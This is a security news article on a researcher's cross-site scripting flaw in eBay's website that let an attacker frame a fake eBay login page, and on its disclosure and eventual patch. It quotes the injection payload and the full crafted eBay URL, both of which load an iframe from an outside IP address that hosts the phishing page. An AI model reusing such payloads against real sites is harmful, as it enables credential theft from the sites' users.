Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

A XSS may have exposed users of the eBay website to phishing attacks

A security researchers reported a Cross-Site Scripting (XSS) vulnerability that may have exposed users of the eBay website to phishing attacks. An independent security researcher, using the nickname MLT, reported last month a simple flaw affecting the eBay website exposed its customers to phishing attacks. An attacker can exploit the vulnerability to host a bogus phishing page on the eBay website attempting […]

A XSS may have exposed users of the eBay website to phishing attacks

A security researchers reported a Cross-Site Scripting (XSS) vulnerability that may have exposed users of the eBay website to phishing attacks.

An independent security researcher, using the nickname MLT, reported last month a simple flaw affecting the eBay website exposed its customers to phishing attacks. An attacker can exploit the vulnerability to host a bogus phishing page on the eBay website attempting to steal users’ login credentials.

The researcher explained that anyone could have already exploited the critical flaw in the eBay website to target eBay users, millions customers login credentials may have been compromised.

“this blog post will highlight exactly how easy it is to exploit XSS vulnerabilites in large sites” MLT wrote in a blog post that describe the hack.

The flaw affected the URL parameter, the attacker was able to exploit a Cross-Site Scripting (XSS) vulnerability to inject a malicious iFrame on the legitimate eBay website. The code used by the researchers redirect visitors of eBay website to a phishing page hosted on a third-party server by using an eBay’s URL. This trick makes it impossible to detect the attack and the phishing page appeared as legitimate.

At this point the researcher a login page that is an exact replica of the eBay login page, the unique difference resided in the second portion of the URL crafted for the attack, but it was impossible to note it.

Below the code used to inject the iFrame containing the phishing page:

document.write(‘<iframec=”http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html&#8221; width=”1500″ height=”1000″>’) 

so the entire URL appears as:

http://ebay.com/link/?nav=webview&url=javascript:document.write%28%27%3Ciframe%20src=%22http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html%22%20width=%221500%22%20height=%221000%22%3E%27%29
ebay bogus login page xss flaw

eBay website bogus login page

Below the video PoC provided by the researcher:

https://youtu.be/WuZ61NWbK_4

MLT reported the flaw to eBay on December 11th, but after a first contact requesting more information, the eBay security team ignored him and did not fix the problem.

It seems that the situation changed after the media contacted eBay asking about the critical vulnerability.

“On Monday, MLT told Motherboard that the bug was patched, according to his tests. Later, eBay confirmed to Motherboard that the flaw was fixed, and that eBay would acknowledge MLT’s bug report on the site’s page dedicated to thanking friendly hackers who report issues on the site.” wrote Lorenzo Bicchierai on Motherboard.

eBay promptly release a security patch on Monday and acknowledged MLT found the flaw and added his name the list of thanks to the hackers that ethically reported the flaw to the company.

Pierluigi Paganini

(Security Affairs – eBay website, hacking)